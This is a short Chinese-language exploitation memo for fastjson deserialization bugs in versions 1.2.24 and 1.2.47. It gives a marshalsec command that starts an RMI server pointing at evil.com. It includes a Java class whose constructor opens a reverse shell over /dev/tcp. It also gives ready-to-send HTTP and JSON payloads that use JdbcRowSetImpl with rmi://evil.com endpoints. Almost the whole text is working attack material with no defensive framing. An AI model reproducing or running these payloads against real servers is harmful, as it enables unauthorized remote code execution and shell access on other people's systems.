fastjson漏洞利用备忘

预备知识：

起rmi服务

用marshalsec-0.0.3-SNAPSHOT-all.jar起一个rmi服务。

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://evil.com/#TouchFile" 9999

恶意字节码代码reverse.java :
（反弹shell）

import java.lang.Runtime;
import java.lang.Process;
public class reverse{
 public reverse() throws Exception{
  Runtime rt=Runtime.getRuntime();
  String[] commands={"/bin/sh","-c","/bin/sh -i > /dev/tcp/your ip/1234 2>&1 0>&1"};
  Process pc=rt.exec(commands);
  pc.waitFor();
 }
}

fastjson 1.2.24 反序列化导致任意命令执行漏洞

payload:

POST / HTTP/1.1
Host: your-ip:8090
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 160

{
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://evil.com:9999/TouchFile",
        "autoCommit":true
    }
}

Fastjson 1.2.47 远程命令执行漏洞

payload:

{
    "a":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://evil.com:9999/Exploit",
        "autoCommit":true
    }
}